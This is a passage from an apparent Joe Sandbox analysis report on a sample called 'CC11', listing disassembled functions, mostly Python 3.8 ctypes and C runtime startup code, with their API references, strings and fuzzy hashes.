minimum size is %zd, xrefs: 00007FF8BFB7E65A
On:resize, xrefs: 00007FF8BFB7E600
excepted ctypes instance, xrefs: 00007FF8BFB7E634

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$FormatMem_$Arg_MallocMemoryParseReallocStringTuplememcpymemset
String ID: Memory cannot be resized because this object doesn't own it$On:resize$excepted ctypes instance$minimum size is %zd
API String ID: 1724287917-828838525
Opcode ID: ad00693b1f41e5ca7e3484ef3154eacaae73e7bba493512c86e3f1556b94f2bf
Instruction ID: f1052349de0dac9328467a31a9d0eaa9b985b87eba8867e6922c6e7ad86adf96
Opcode Fuzzy Hash: ad00693b1f41e5ca7e3484ef3154eacaae73e7bba493512c86e3f1556b94f2bf
Instruction Fuzzy Hash: 69411765A09B0685EB289F9AE8500B93BA1FF88FD8B051532DB0E47B65DE3CE484C341

Function 00007FF8BFB75A64 Relevance: 21.2, APIs: 14, Instructions: 235COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8BFB75A8C
__scrt_initialize_crt.LIBCMT ref: 00007FF8BFB75AD1
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8BFB75AF2
_RTC_Initialize.LIBCMT ref: 00007FF8BFB75B20
__scrt_initialize_default_local_stdio_options.LIBCMT ref: 00007FF8BFB75B2A
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF8BFB75B46
__scrt_release_startup_lock.LIBCMT ref: 00007FF8BFB75B71
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF8BFB75B90
__scrt_fastfail.LIBCMT ref: 00007FF8BFB75BC6
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8BFB75C08
_RTC_Initialize.LIBCMT ref: 00007FF8BFB75C27
__scrt_release_startup_lock.LIBCMT ref: 00007FF8BFB75C3A
__scrt_uninitialize_crt.LIBCMT ref: 00007FF8BFB75C44
__scrt_fastfail.LIBCMT ref: 00007FF8BFB75C57

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_fastfail__scrt_release_startup_lock$__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_uninitialize_crt
String ID:
API String ID: 627783611-0
Opcode ID: 0ebd8746482718f53aaa09db22ff1335a23d4f0a5baafc4d55a168c058cf6849
Instruction ID: 7891d1fb8e339a02661110510303bff4fa15abcf3a8cefa02ad0bb15945b2781
Opcode Fuzzy Hash: 0ebd8746482718f53aaa09db22ff1335a23d4f0a5baafc4d55a168c058cf6849
Instruction Fuzzy Hash: BF91CE21F0C64786FB54ABEE9481AB92B92EF857C0F149439DB1D47797EE3CE8458700

Function 00007FF8BFB7C0D0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7C1B6
PyObject_IsInstance.PYTHON38 ref: 00007FF8BFB7C1D4
PyType_IsSubtype.PYTHON38 ref: 00007FF8BFB7C1FB
PyType_IsSubtype.PYTHON38 ref: 00007FF8BFB7C215
PyType_IsSubtype.PYTHON38 ref: 00007FF8BFB7C245
PyType_IsSubtype.PYTHON38 ref: 00007FF8BFB7C273
PyUnicode_AsUTF8.PYTHON38 ref: 00007FF8BFB7C296
_PyObject_LookupAttrId.PYTHON38 ref: 00007FF8BFB7C2E9
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7C31B
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7C337

Strings

wrong type, xrefs: 00007FF8BFB7C32D
P, xrefs: 00007FF8BFB7C22F

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: SubtypeType_$DeallocObject_$AttrErr_InstanceLookupStringUnicode_
String ID: P$wrong type
API String ID: 1377076302-281217272
Opcode ID: 978eeed2b6b77deb299817cca6917130e5b22cb48f60c1b97f36ef281d6ad2ee
Instruction ID: 33c9d93824bb77a32224dd51c25c8dc9872b69191897d00d59c22755253672a3
Opcode Fuzzy Hash: 978eeed2b6b77deb299817cca6917130e5b22cb48f60c1b97f36ef281d6ad2ee
Instruction Fuzzy Hash: ED815BA1A0DA4380FB549F9DD8502792BA0EF95FC4F488439CB4E87BA5EF2CE944C340

Function 00007FF8BFB7D610 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 123threadCOMMON

Download Yara Rule

APIs

PyEval_SaveThread.PYTHON38(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8BFB7D656
GetErrorInfo.OLEAUT32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8BFB7D69B
PyEval_RestoreThread.PYTHON38(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8BFB7D6F8
ProgIDFromCLSID.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8BFB7D70B
Py_BuildValue.PYTHON38(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8BFB7D74D
PyErr_SetObject.PYTHON38(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8BFB7D765
_Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8BFB7D774
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8BFB7D77D
SysFreeString.OLEAUT32 ref: 00007FF8BFB7D78C
SysFreeString.OLEAUT32 ref: 00007FF8BFB7D79B
SysFreeString.OLEAUT32 ref: 00007FF8BFB7D7AA

Strings

iu(uuuiu), xrefs: 00007FF8BFB7D746

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Free$String$Eval_Thread$BuildDeallocErr_ErrorFromInfoLocalObjectProgRestoreSaveValue
String ID: iu(uuuiu)
API String ID: 2817777535-1877708109
Opcode ID: e5eff153cfe1cd8670bfd46b16d384ab02d5ebfb2d41f94c074ba4d46b02b2fa
Instruction ID: cdfca94620beeaaf7bc45340b150aecdac6bbc0c622d405c3131742252941f6b
Opcode Fuzzy Hash: e5eff153cfe1cd8670bfd46b16d384ab02d5ebfb2d41f94c074ba4d46b02b2fa
Instruction Fuzzy Hash: 7651C666B05A469AEB00DFA9D4943AC27B0FB88FD9F004536DE0E57B59DF38D509C340

Function 00007FF8BFB729D0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

_PyDict_GetItemIdWithError.PYTHON38 ref: 00007FF8BFB72A31
PyLong_AsUnsignedLongMask.PYTHON38 ref: 00007FF8BFB72A57
_PyDict_GetItemIdWithError.PYTHON38 ref: 00007FF8BFB72A71
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB72B0D

Part of subcall function 00007FF8BFB741F8: PySequence_Tuple.PYTHON38 ref: 00007FF8BFB74210
Part of subcall function 00007FF8BFB741F8: PyTuple_New.PYTHON38 ref: 00007FF8BFB74229
Part of subcall function 00007FF8BFB741F8: _PyObject_LookupAttrId.PYTHON38 ref: 00007FF8BFB7425C

_PyDict_GetItemIdWithError.PYTHON38 ref: 00007FF8BFB72AAF
_PyObject_LookupAttrId.PYTHON38 ref: 00007FF8BFB72AF6
PyCallable_Check.PYTHON38 ref: 00007FF8BFB77A33
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB77A4A
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB77A5E
PyErr_SetString.PYTHON38 ref: 00007FF8BFB77A7E

Strings

class must define _flags_ which must be an integer, xrefs: 00007FF8BFB77A6D
_restype_ must be a type, a callable, or None, xrefs: 00007FF8BFB77A41

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$Dict_ErrorItemOccurredWith$AttrLookupObject_$Callable_CheckLongLong_MaskSequence_StringTupleTuple_Unsigned
String ID: _restype_ must be a type, a callable, or None$class must define _flags_ which must be an integer
API String ID: 3087875697-2538317290
Opcode ID: a650ae08d96c4e209c106faa92d77aba7b425a04122475ea6e6e737c462934a6
Instruction ID: 9cea2c11e74edbe759cf6138db513b37c87d4a6a0f2410f80b56711187ebc347
Opcode Fuzzy Hash: a650ae08d96c4e209c106faa92d77aba7b425a04122475ea6e6e737c462934a6
Instruction Fuzzy Hash: 8D410A21A0AB4291FA559FA9E94437877A4FF84BC4F185235CB5D477A1EF3CE4A4C300

Function 00007FF8BFB741F8 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

PySequence_Tuple.PYTHON38 ref: 00007FF8BFB74210
PyTuple_New.PYTHON38 ref: 00007FF8BFB74229
_PyObject_LookupAttrId.PYTHON38 ref: 00007FF8BFB7425C
PyErr_SetString.PYTHON38 ref: 00007FF8BFB790C5
PyErr_Format.PYTHON38 ref: 00007FF8BFB790E2
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB790F8
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB79109
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB79118
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB7911E
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7912E

Strings

_argtypes_ must be a sequence of types, xrefs: 00007FF8BFB790BB
item %zd in _argtypes_ has no from_param method, xrefs: 00007FF8BFB790D8

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dealloc$Err_$AttrFormatLookupObject_OccurredSequence_StringTupleTuple_
String ID: _argtypes_ must be a sequence of types$item %zd in _argtypes_ has no from_param method
API String ID: 846282434-3063448601
Opcode ID: 3ff5ebf6d040ac514a47d7c7f21607858fbd491d35113fefa722fe6b848f6617
Instruction ID: 71fa135adfdce474c90e7f93592d3350f4d47b289dd0495fad75e520d896df02
Opcode Fuzzy Hash: 3ff5ebf6d040ac514a47d7c7f21607858fbd491d35113fefa722fe6b848f6617
Instruction Fuzzy Hash: E7313832A0AA43D5EB54AFAEE8440B96BA4EF85BD5F084131CB0E46B65DF3DE455C300

Function 00007FF8BFB797BC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 118COMMON

Download Yara Rule

APIs

PyNumber_AsSsize_t.PYTHON38 ref: 00007FF8BFB79811
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB79820
PyErr_SetString.PYTHON38 ref: 00007FF8BFB79938

Strings

Array does not support item deletion, xrefs: 00007FF8BFB797E1
Can only assign sequence of same size, xrefs: 00007FF8BFB798C9
indices must be integer, xrefs: 00007FF8BFB79927

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$Number_OccurredSsize_tString
String ID: Array does not support item deletion$Can only assign sequence of same size$indices must be integer
API String ID: 3815977620-3643249925
Opcode ID: 6b6318933739b3b075ee83dfb703e90efbd664ea45f1749ba5fa0166e0716b41
Instruction ID: f5d11ed6aa4d98bf11032ca4cf4aeea72cd2e93fbb44778b3dcc161b257d5e8c
Opcode Fuzzy Hash: 6b6318933739b3b075ee83dfb703e90efbd664ea45f1749ba5fa0166e0716b41
Instruction Fuzzy Hash: E3414B66A09A8291FE548FEAD8401B96B61FF84BE8F044532DF1E47795EE3CE485C300

Function 00007FF8BFB79EA4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON38 ref: 00007FF8BFB79EDE
_PyArg_ParseTuple_SizeT.PYTHON38 ref: 00007FF8BFB79F02
PyErr_SetString.PYTHON38 ref: 00007FF8BFB79F2A
PyBuffer_Release.PYTHON38 ref: 00007FF8BFB79F35
PyErr_Format.PYTHON38 ref: 00007FF8BFB79F66
memcpy.VCRUNTIME140 ref: 00007FF8BFB79F98
PyBuffer_Release.PYTHON38 ref: 00007FF8BFB79FA5

Strings

Buffer size too small (%zd instead of at least %zd bytes), xrefs: 00007FF8BFB79F5C
y*|n:from_buffer_copy, xrefs: 00007FF8BFB79EFB
offset cannot be negative, xrefs: 00007FF8BFB79F20
abstract class, xrefs: 00007FF8BFB79ED4

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$Buffer_ReleaseString$Arg_FormatParseSizeTuple_memcpy
String ID: Buffer size too small (%zd instead of at least %zd bytes)$abstract class$offset cannot be negative$y*|n:from_buffer_copy
API String ID: 1815618437-871501202
Opcode ID: 03d886769cc6716227b8711dd5de20201db812fee66a2c828ced65105659bb97
Instruction ID: 2f1d948b09bee3edaee4307353a05afe1d3db374466fb688c161e45da43723b5
Opcode Fuzzy Hash: 03d886769cc6716227b8711dd5de20201db812fee66a2c828ced65105659bb97
Instruction Fuzzy Hash: 91310665B19B8681EB20DFAEE8901B967A0FBC8FC4B544032DB5E87B65DE3CE505C740

Function 00007FF6900120F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF69001211B
SelectObject.GDI32 ref: 00007FF690012162
DrawTextW.USER32 ref: 00007FF690012185
SelectObject.GDI32 ref: 00007FF69001219B
ReleaseDC.USER32 ref: 00007FF6900121AB
MoveWindow.USER32 ref: 00007FF6900121FB
MoveWindow.USER32 ref: 00007FF69001223B
MoveWindow.USER32 ref: 00007FF69001228E
MoveWindow.USER32 ref: 00007FF6900122D6

Strings

P%, xrefs: 00007FF69001216F

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
Instruction ID: 3d794453b29d6e52b5fef5efc14075ca947aac606ac034f791f3d8966fb337e9
Opcode Fuzzy Hash: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
Instruction Fuzzy Hash: 9A510726604BA186D6349F36E4185BAB7A2FB98B65F004131EFDE83789DF3CD085CB10

Function 00007FF8BFB7D8B0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 102COMMON

Download Yara Rule

APIs

PyUnicode_FromString.PYTHON38 ref: 00007FF8BFB7DA35

Strings

<cparam '%c' (%p)>, xrefs: 00007FF8BFB7D9CD
<cparam '%c' (%f)>, xrefs: 00007FF8BFB7DA1F
<cparam '%c' (%d)>, xrefs: 00007FF8BFB7D92C
<cparam '%c' (%ld)>, xrefs: 00007FF8BFB7D9EC
<cparam 0x%02x at %p>, xrefs: 00007FF8BFB7D9C4
<cparam '%c' ('\x%02x')>, xrefs: 00007FF8BFB7D961
<cparam '%c' (%I64d)>, xrefs: 00007FF8BFB7D9D6
<cparam '%c' at %p>, xrefs: 00007FF8BFB7D9B6
<cparam '%c' ('%c')>, xrefs: 00007FF8BFB7D953

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: FromStringUnicode_
String ID: <cparam '%c' (%I64d)>$<cparam '%c' (%d)>$<cparam '%c' (%f)>$<cparam '%c' (%ld)>$<cparam '%c' (%p)>$<cparam '%c' ('%c')>$<cparam '%c' ('\x%02x')>$<cparam '%c' at %p>$<cparam 0x%02x at %p>
API String ID: 2818169177-1032293993
Opcode ID: 8e7886e10174158f50e63f1f00364b570f2f82a2db45fe417b6a369fba985387
Instruction ID: dfe6f6c113994ba1d5c743bda7a889ee83ce2945c9cf3b9d079f3e323818a1a5
Opcode Fuzzy Hash: 8e7886e10174158f50e63f1f00364b570f2f82a2db45fe417b6a369fba985387
Instruction Fuzzy Hash: EA41AF62A1D54385E7799FBCE8545792F71FF897C8F980232D78E068A9EE2CE905C300

Function 00007FF8BFB7AE3C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

_PyArg_ParseTuple_SizeT.PYTHON38 ref: 00007FF8BFB7AE73
memcpy.VCRUNTIME140 ref: 00007FF8BFB7AE99
PyObject_GetAttrString.PYTHON38 ref: 00007FF8BFB7AEA8
PyErr_Format.PYTHON38 ref: 00007FF8BFB7AEE4
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7AEF3
PyDict_Update.PYTHON38 ref: 00007FF8BFB7AF0E
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7AF1F

Strings

__dict__, xrefs: 00007FF8BFB7AE9E
O!s#, xrefs: 00007FF8BFB7AE61
%.200s.__dict__ must be a dictionary, not %.200s, xrefs: 00007FF8BFB7AECB

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dealloc$Arg_AttrDict_Err_FormatObject_ParseSizeStringTuple_Updatememcpy
String ID: %.200s.__dict__ must be a dictionary, not %.200s$O!s#$__dict__
API String ID: 111561578-4068157617
Opcode ID: 58e6a00ed9d267c7dd8526cada96408385d97ceb47587c6d35058d8e66b14ce7
Instruction ID: daee6d019701e18aefcbe87488ad599b46d5f6bf77806eea58a4cd0535ff7483
Opcode Fuzzy Hash: 58e6a00ed9d267c7dd8526cada96408385d97ceb47587c6d35058d8e66b14ce7
Instruction Fuzzy Hash: 53312772A09B8681EB809FEAE8440B873A4FB89BE4B584136DB5D47761DF3CE494C300

Function 00007FF8BFB738F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF8BFB73993

Part of subcall function 00007FF8BFB73D20: ffi_prep_cif.LIBFFI-7 ref: 00007FF8BFB73D86
Part of subcall function 00007FF8BFB73D20: ffi_call.LIBFFI-7 ref: 00007FF8BFB73DEB
Part of subcall function 00007FF8BFB73D20: PyErr_Occurred.PYTHON38 ref: 00007FF8BFB73E42

_Py_Dealloc.PYTHON38 ref: 00007FF8BFB73B52
PyObject_CallFunctionObjArgs.PYTHON38 ref: 00007FF8BFB73BA6
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7883A

Strings

argument %zd: , xrefs: 00007FF8BFB78858

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dealloc$ArgsCallErr_FunctionObject_Occurredffi_callffi_prep_cifmemset
String ID: argument %zd:
API String ID: 3446152234-2109984780
Opcode ID: c920e970e24f574a3f25393bfb0e58e5599c1a73d600db7067e46461ab7b5ab3
Instruction ID: f82d38600435c94539692823037c7c1039e85f8cf3a786ac204744820d54e13b
Opcode Fuzzy Hash: c920e970e24f574a3f25393bfb0e58e5599c1a73d600db7067e46461ab7b5ab3
Instruction Fuzzy Hash: 3EA1B023B09B8285EA608FA9D8402B96B60FF40BE4F584636DB6E47BD5DF3CE5518300

Function 00007FF8BFB73F80 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

PyLong_FromLong.PYTHON38(?,?,?,00007FF8BFB73B38), ref: 00007FF8BFB78E46
PyType_IsSubtype.PYTHON38(?,?,?,00007FF8BFB73B38), ref: 00007FF8BFB78E61
PyObject_CallFunctionObjArgs.PYTHON38(?,?,?,00007FF8BFB73B38), ref: 00007FF8BFB78ED3
_PyTraceback_Add.PYTHON38(?,?,?,00007FF8BFB73B38), ref: 00007FF8BFB78EF5
_Py_Dealloc.PYTHON38(?,?,?,00007FF8BFB73B38), ref: 00007FF8BFB78F04
PyObject_CallFunction.PYTHON38(?,?,?,00007FF8BFB73B38), ref: 00007FF8BFB78F1F

Strings

_ctypes/callproc.c, xrefs: 00007FF8BFB78EE7
GetResult, xrefs: 00007FF8BFB78EEE

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: CallFunctionObject_$ArgsDeallocFromLongLong_SubtypeTraceback_Type_
String ID: GetResult$_ctypes/callproc.c
API String ID: 276671208-4166898048
Opcode ID: 530bc2d210fd3b323a0918ef7c54ceed0a47631cf21d4f88d000686fb3151742
Instruction ID: db2a2b7f4308bcb1e8af2c45f0b5d28d18e354dc79ca0d168b02d27db4f6b552
Opcode Fuzzy Hash: 530bc2d210fd3b323a0918ef7c54ceed0a47631cf21d4f88d000686fb3151742
Instruction Fuzzy Hash: FA518C21A0EA42C2EB599B9EE95027877A5EF85BC1F584431DB4E076A6DF3CF445C300

Function 00007FF8BFB7B5E0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON38 ref: 00007FF8BFB7B612
PyErr_Format.PYTHON38 ref: 00007FF8BFB7B646
PyUnicode_AsWideChar.PYTHON38 ref: 00007FF8BFB7B659
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7B684
PyUnicode_AsWideChar.PYTHON38 ref: 00007FF8BFB7B697
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7B6C2

Strings

can't delete attribute, xrefs: 00007FF8BFB7B608
unicode string expected instead of %s instance, xrefs: 00007FF8BFB7B638
string too long, xrefs: 00007FF8BFB7B67A

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
